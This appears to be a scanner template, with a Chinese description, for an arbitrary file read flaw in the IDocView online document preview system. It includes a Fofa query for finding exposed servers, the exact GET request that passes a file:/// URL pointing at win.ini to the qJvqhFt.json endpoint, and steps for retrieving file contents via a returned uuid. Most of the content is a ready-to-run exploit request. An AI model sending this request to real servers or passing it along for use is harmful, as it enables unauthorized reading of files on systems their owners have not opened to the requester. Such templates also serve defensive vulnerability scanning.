漏洞描述
IDocView在线文档预览系统qJvqhFt任意文件读取
1.通过上述poc获取uuid值
2.访问url+/view/uuid读取文件内容
Fofa: title=="在线文档预览 - I Doc View"
id: idocview-qjvqhft-fileread
info:
name: IDocView在线文档预览系统qJvqhFt任意文件读取
author: zan8in
severity: high
verified: true
description: |-
IDocView在线文档预览系统qJvqhFt任意文件读取
1.通过上述poc获取uuid值
2.访问url+/view/uuid读取文件内容
Fofa: title=="在线文档预览 - I Doc View"
reference:
- https://mp.weixin.qq.com/s/XJ6GSiQ2-h0rKMmKhpE8wA
tags: idocview,fileread
created: 2024/01/09
rules:
r0:
request:
method: GET
path: /view/qJvqhFt.json?start=1&size=5&url=file:///C:/windows/win.ini&idocv_auth=sapi
expression: response.status == 200 && response.body.bcontains(b'"uuid":') && response.body.bcontains(b'"md5":') && response.body.bcontains(b"bit app support")
expression: r0()